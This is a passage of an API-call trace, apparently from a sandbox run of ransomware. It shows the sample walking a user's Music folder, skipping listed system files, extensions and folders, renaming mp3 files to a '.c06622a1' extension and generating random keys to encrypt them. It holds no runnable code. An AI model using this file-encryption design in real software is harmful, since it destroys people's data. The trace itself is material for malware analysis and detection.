_Str2="mp3") returned -1 [0160.139] wcslen (_String="lnk") returned 0x3 [0160.139] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.139] wcslen (_String="mod") returned 0x3 [0160.139] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.139] wcslen (_String="mpa") returned 0x3 [0160.139] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.139] wcslen (_String="msc") returned 0x3 [0160.139] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.139] wcslen (_String="msp") returned 0x3 [0160.139] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.139] wcslen (_String="msstyles") returned 0x8 [0160.139] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.139] wcslen (_String="msu") returned 0x3 [0160.139] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.139] wcslen (_String="nls") returned 0x3 [0160.139] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.139] wcslen (_String="nomedia") returned 0x7 [0160.139] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.139] wcslen (_String="ocx") returned 0x3 [0160.139] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.139] wcslen (_String="prf") returned 0x3 [0160.139] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.139] wcslen (_String="ps1") returned 0x3 [0160.139] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.139] wcslen (_String="rom") returned 0x3 [0160.139] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.140] wcslen (_String="rtp") returned 0x3 [0160.140] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.140] wcslen (_String="scr") returned 0x3 [0160.140] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.140] wcslen (_String="shs") returned 0x3 [0160.140] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.140] wcslen (_String="spl") returned 0x3 [0160.140] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.140] wcslen (_String="sys") returned 0x3 [0160.140] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.140] wcslen (_String="theme") returned 0x5 [0160.140] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.140] wcslen (_String="themepack") returned 0x9 [0160.140] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.140] wcslen (_String="wpx") returned 0x3 [0160.140] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.140] wcslen (_String="lock") returned 0x4 [0160.140] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.140] wcslen (_String="key") returned 0x3 [0160.140] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.140] wcslen (_String="hta") returned 0x3 [0160.140] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.140] wcslen (_String="msi") returned 0x3 [0160.140] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.140] wcslen (_String="pdb") returned 0x3 [0160.140] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.140] wcslen (_String="sqlite") returned 0x6 [0160.140] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x")) returned 0x10 [0160.141] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0160.141] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" [0160.141] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned 0x2e [0160.141] wcscpy (in: _Dest=0x32400be, _Source="jiDmBv.mp3" | out: _Dest="jiDmBv.mp3") returned="jiDmBv.mp3" [0160.141] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3", dwFileAttributes=0x80) returned 1 [0160.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\jidmbv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0160.141] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.141] ReadFile (in: hFile=0x1a8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0160.142] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x36850826 [0160.142] RtlComputeCrc32 (PartialCrc=0x826, Buffer=0x32e9a4, Length=0x80) returned 0xc357a605 [0160.142] RtlComputeCrc32 (PartialCrc=0xa605, Buffer=0x32e9a4, Length=0x80) returned 0x984fdf61 [0160.142] RtlComputeCrc32 (PartialCrc=0xdf61, Buffer=0x32e9a4, Length=0x80) returned 0xd265f396 [0160.142] RtlComputeCrc32 (PartialCrc=0xf396, Buffer=0x32e9a4, Length=0x80) returned 0x5e2c97f7 [0160.142] CloseHandle (hObject=0x1a8) returned 1 [0160.142] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0160.142] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3" [0160.142] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3") returned 0x39 [0160.143] wcscpy (in: _Dest=0x32500da, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.143] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\jidmbv.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\jidmbv.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\jiDmBv.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\jidmbv.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0160.145] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0160.145] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x37e0020 [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x648dfa6d [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b46315e [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x69a78a43 [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x309c49c9 [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68864e0f [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc2afcd8 [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x72ba933a [0160.153] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65148e84 [0160.156] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x37e0094, Length=0x80) returned 0xb327132c [0160.156] RtlComputeCrc32 (PartialCrc=0x132c, Buffer=0x37e0094, Length=0x80) returned 0xe126700f [0160.156] RtlComputeCrc32 (PartialCrc=0x700f, Buffer=0x37e0094, Length=0x80) returned 0xe7745b0c [0160.156] RtlComputeCrc32 (PartialCrc=0x5b0c, Buffer=0x37e0094, Length=0x80) returned 0xf7704689 [0160.156] RtlComputeCrc32 (PartialCrc=0x4689, Buffer=0x37e0094, Length=0x80) returned 0x97c189be [0160.156] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x37e0020) returned 1 [0160.156] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.156] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.156] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc09a5ce0, ftCreationTime.dwHighDateTime=0x1d5dae7, ftLastAccessTime.dwLowDateTime=0x57587d20, ftLastAccessTime.dwHighDateTime=0x1d5dd8a, ftLastWriteTime.dwLowDateTime=0x57587d20, ftLastWriteTime.dwHighDateTime=0x1d5dd8a, nFileSizeHigh=0x0, nFileSizeLow=0x4a8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="KURBcjl3.mp3", cAlternateFileName="")) returned 1 [0160.156] _wcsicmp (_Str1="KURBcjl3.mp3", _Str2="README.c06622a1.TXT") returned -7 [0160.156] wcsstr (_Str="KURBcjl3.mp3", _SubStr="README") returned 0x0 [0160.157] _wcsicmp (_Str1="autorun.inf", _Str2="KURBcjl3.mp3") returned -10 [0160.157] wcslen (_String="autorun.inf") returned 0xb [0160.157] _wcsicmp (_Str1="boot.ini", _Str2="KURBcjl3.mp3") returned -9 [0160.157] wcslen (_String="boot.ini") returned 0x8 [0160.157] _wcsicmp (_Str1="bootfont.bin", _Str2="KURBcjl3.mp3") returned -9 [0160.157] wcslen (_String="bootfont.bin") returned 0xc [0160.157] _wcsicmp (_Str1="bootsect.bak", _Str2="KURBcjl3.mp3") returned -9 [0160.157] wcslen (_String="bootsect.bak") returned 0xc [0160.157] _wcsicmp (_Str1="desktop.ini", _Str2="KURBcjl3.mp3") returned -7 [0160.157] wcslen (_String="desktop.ini") returned 0xb [0160.157] _wcsicmp (_Str1="iconcache.db", _Str2="KURBcjl3.mp3") returned -2 [0160.157] wcslen (_String="iconcache.db") returned 0xc [0160.157] _wcsicmp (_Str1="ntldr", _Str2="KURBcjl3.mp3") returned 3 [0160.157] wcslen (_String="ntldr") returned 0x5 [0160.157] _wcsicmp (_Str1="ntuser.dat", _Str2="KURBcjl3.mp3") returned 3 [0160.157] wcslen (_String="ntuser.dat") returned 0xa [0160.157] _wcsicmp (_Str1="ntuser.dat.log", _Str2="KURBcjl3.mp3") returned 3 [0160.157] wcslen (_String="ntuser.dat.log") returned 0xe [0160.157] _wcsicmp (_Str1="ntuser.ini", _Str2="KURBcjl3.mp3") returned 3 [0160.157] wcslen (_String="ntuser.ini") returned 0xa [0160.157] _wcsicmp (_Str1="thumbs.db", _Str2="KURBcjl3.mp3") returned 9 [0160.157] wcslen (_String="thumbs.db") returned 0x9 [0160.157] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0160.157] wcslen (_String="386") returned 0x3 [0160.157] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0160.157] wcslen (_String="adv") returned 0x3 [0160.157] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0160.157] wcslen (_String="ani") returned 0x3 [0160.157] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0160.158] wcslen (_String="bat") returned 0x3 [0160.158] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0160.158] wcslen (_String="bin") returned 0x3 [0160.158] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0160.158] wcslen (_String="cab") returned 0x3 [0160.158] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0160.158] wcslen (_String="cmd") returned 0x3 [0160.158] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0160.158] wcslen (_String="com") returned 0x3 [0160.158] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0160.158] wcslen (_String="cpl") returned 0x3 [0160.158] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0160.158] wcslen (_String="cur") returned 0x3 [0160.158] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0160.158] wcslen (_String="deskthemepack") returned 0xd [0160.158] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0160.158] wcslen (_String="diagcab") returned 0x7 [0160.158] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0160.158] wcslen (_String="diagcfg") returned 0x7 [0160.158] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0160.158] wcslen (_String="diagpkg") returned 0x7 [0160.158] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0160.158] wcslen (_String="dll") returned 0x3 [0160.158] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0160.158] wcslen (_String="drv") returned 0x3 [0160.158] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0160.158] wcslen (_String="exe") returned 0x3 [0160.158] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0160.159] wcslen (_String="hlp") returned 0x3 [0160.159] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0160.159] wcslen (_String="icl") returned 0x3 [0160.159] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0160.159] wcslen (_String="icns") returned 0x4 [0160.159] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0160.159] wcslen (_String="ico") returned 0x3 [0160.159] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0160.159] wcslen (_String="ics") returned 0x3 [0160.159] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0160.159] wcslen (_String="idx") returned 0x3 [0160.159] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0160.159] wcslen (_String="ldf") returned 0x3 [0160.159] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0160.159] wcslen (_String="lnk") returned 0x3 [0160.159] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0160.159] wcslen (_String="mod") returned 0x3 [0160.159] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0160.159] wcslen (_String="mpa") returned 0x3 [0160.159] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0160.159] wcslen (_String="msc") returned 0x3 [0160.159] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0160.159] wcslen (_String="msp") returned 0x3 [0160.159] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0160.159] wcslen (_String="msstyles") returned 0x8 [0160.159] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0160.159] wcslen (_String="msu") returned 0x3 [0160.159] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0160.159] wcslen (_String="nls") returned 0x3 [0160.159] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0160.159] wcslen (_String="nomedia") returned 0x7 [0160.160] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0160.160] wcslen (_String="ocx") returned 0x3 [0160.160] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0160.160] wcslen (_String="prf") returned 0x3 [0160.160] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0160.160] wcslen (_String="ps1") returned 0x3 [0160.160] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0160.160] wcslen (_String="rom") returned 0x3 [0160.160] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0160.160] wcslen (_String="rtp") returned 0x3 [0160.160] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0160.160] wcslen (_String="scr") returned 0x3 [0160.160] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0160.160] wcslen (_String="shs") returned 0x3 [0160.160] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0160.160] wcslen (_String="spl") returned 0x3 [0160.160] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0160.160] wcslen (_String="sys") returned 0x3 [0160.160] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0160.160] wcslen (_String="theme") returned 0x5 [0160.160] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0160.160] wcslen (_String="themepack") returned 0x9 [0160.160] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0160.160] wcslen (_String="wpx") returned 0x3 [0160.160] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0160.160] wcslen (_String="lock") returned 0x4 [0160.160] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0160.160] wcslen (_String="key") returned 0x3 [0160.160] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0160.160] wcslen (_String="hta") returned 0x3 [0160.161] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0160.161] wcslen (_String="msi") returned 0x3 [0160.161] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0160.161] wcslen (_String="pdb") returned 0x3 [0160.161] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0160.161] wcslen (_String="sqlite") returned 0x6 [0160.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x")) returned 0x10 [0160.161] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0160.161] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x" [0160.161] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x") returned 0x2e [0160.161] wcscpy (in: _Dest=0x32400be, _Source="KURBcjl3.mp3" | out: _Dest="KURBcjl3.mp3") returned="KURBcjl3.mp3" [0160.161] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3", dwFileAttributes=0x80) returned 1 [0160.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\kurbcjl3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0160.161] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0160.162] ReadFile (in: hFile=0x1c0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0160.162] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x3191e720 [0160.162] RtlComputeCrc32 (PartialCrc=0xe720, Buffer=0x32e9a4, Length=0x80) returned 0xcd5ef452 [0160.162] RtlComputeCrc32 (PartialCrc=0xf452, Buffer=0x32e9a4, Length=0x80) returned 0x7cada9c9 [0160.162] RtlComputeCrc32 (PartialCrc=0xa9c9, Buffer=0x32e9a4, Length=0x80) returned 0xd1195d05 [0160.162] RtlComputeCrc32 (PartialCrc=0x5d05, Buffer=0x32e9a4, Length=0x80) returned 0x322ed85e [0160.162] CloseHandle (hObject=0x1c0) returned 1 [0160.163] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0160.163] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3" [0160.163] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3") returned 0x3b [0160.163] wcscpy (in: _Dest=0x32500de, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0160.163] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\kurbcjl3.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\kurbcjl3.mp3.c06622a1"), dwFlags=0x8) returned 1 [0160.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\KURBcjl3.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uulx-x\\kurbcjl3.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0160.175] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0160.175] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3870020 [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x634e174a [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x60cf522 [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x300a51ee [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1577f589 [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ba6f367 [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1e281847 [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x327919c4 [0160.182] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x35460214 [0160.185] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3870094, Length=0x80) returned 0xfa4a2f67 [0160.185] RtlComputeCrc32 (PartialCrc=0x2f67, Buffer=0x3870094, Length=0x80) returned 0xd2ecc326 [0160.185] RtlComputeCrc32 (PartialCrc=0xc326, Buffer=0x3870094, Length=0x80) returned 0xd319ed25 [0160.185] RtlComputeCrc32 (PartialCrc=0xed25, Buffer=0x3870094, Length=0x80) returned 0xa7171778 [0160.185] RtlComputeCrc32 (PartialCrc=0x1778, Buffer=0x3870094, Length=0x80) returned 0xdd295cc4 [0160.185] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3870020) returned 1 [0160.186] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0160.186] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0160.186] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc5a28240, ftCreationTime.dwHighDateTime=0x1d5ddf7, ftLastAccessTime.dwLowDateTime=0x57178bc0, ftLastAccessTime.dwHighDateTime=0x1d5d9d5, ftLastWriteTime.dwLowDateTime=0x57178bc0, ftLastWriteTime.dwHighDateTime=0x1d5d9d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lNiXwvZG3UHVD9Kw D Q", cAlternateFileName="LNIXWV~1")) returned 1 [0160.186] _wcsicmp (_Str1="$recycle.bin", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -72 [0160.186] wcslen (_String="$recycle.bin") returned 0xc [0160.186] _wcsicmp (_Str1="config.msi", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -9 [0160.186] wcslen (_String="config.msi") returned 0xa [0160.186] _wcsicmp (_Str1="$windows.~bt", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -72 [0160.186] wcslen (_String="$windows.~bt") returned 0xc [0160.186] _wcsicmp (_Str1="$windows.~ws", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -72 [0160.186] wcslen (_String="$windows.~ws") returned 0xc [0160.186] _wcsicmp (_Str1="windows", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 11 [0160.186] wcslen (_String="windows") returned 0x7 [0160.186] _wcsicmp (_Str1="appdata", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -11 [0160.186] wcslen (_String="appdata") returned 0x7 [0160.186] _wcsicmp (_Str1="application data", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -11 [0160.186] wcslen (_String="application data") returned 0x10 [0160.186] _wcsicmp (_Str1="boot", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -10 [0160.186] wcslen (_String="boot") returned 0x4 [0160.186] _wcsicmp (_Str1="google", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -5 [0160.186] wcslen (_String="google") returned 0x6 [0160.186] _wcsicmp (_Str1="mozilla", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 1 [0160.186] wcslen (_String="mozilla") returned 0x7 [0160.186] _wcsicmp (_Str1="program files", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 4 [0160.186] wcslen (_String="program files") returned 0xd [0160.186] _wcsicmp (_Str1="program files (x86)", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 4 [0160.187] wcslen (_String="program files (x86)") returned 0x13 [0160.187] _wcsicmp (_Str1="programdata", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 4 [0160.187] wcslen (_String="programdata") returned 0xb [0160.187] _wcsicmp (_Str1="system volume information", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 7 [0160.187] wcslen (_String="system volume information") returned 0x19 [0160.187] _wcsicmp (_Str1="tor browser", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 8 [0160.187] wcslen (_String="tor browser") returned 0xb [0160.187] _wcsicmp (_Str1="windows.old", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 11 [0160.187] wcslen (_String="windows.old") returned 0xb [0160.187] _wcsicmp (_Str1="intel", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -3 [0160.187] wcslen (_String="intel") returned 0x5 [0160.187] _wcsicmp (_Str1="msocache", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 1 [0160.187] wcslen (_String="msocache") returned 0x8 [0160.187] _wcsicmp (_Str1="perflogs", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 4 [0160.187] wcslen (_String="perflogs") returned 0x8 [0160.187] _wcsicmp (_Str1="x64dbg", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 12 [0160.187] wcslen (_String="x64dbg") returned 0x6 [0160.187] _wcsicmp (_Str1="public", _Str2="lNiXwvZG3UHVD9Kw D Q") returned 4 [0160.187] wcslen (_String="public") returned 0x6 [0160.187] _wcsicmp (_Str1="all users", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -11 [0160.187] wcslen (_String="all users") returned 0x9 [0160.187] _wcsicmp (_Str1="default", _Str2="lNiXwvZG3UHVD9Kw D Q") returned -8 [0160.187] wcslen (_String="default") returned 0x7 [0160.187] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Uulx-x\\*" | out: 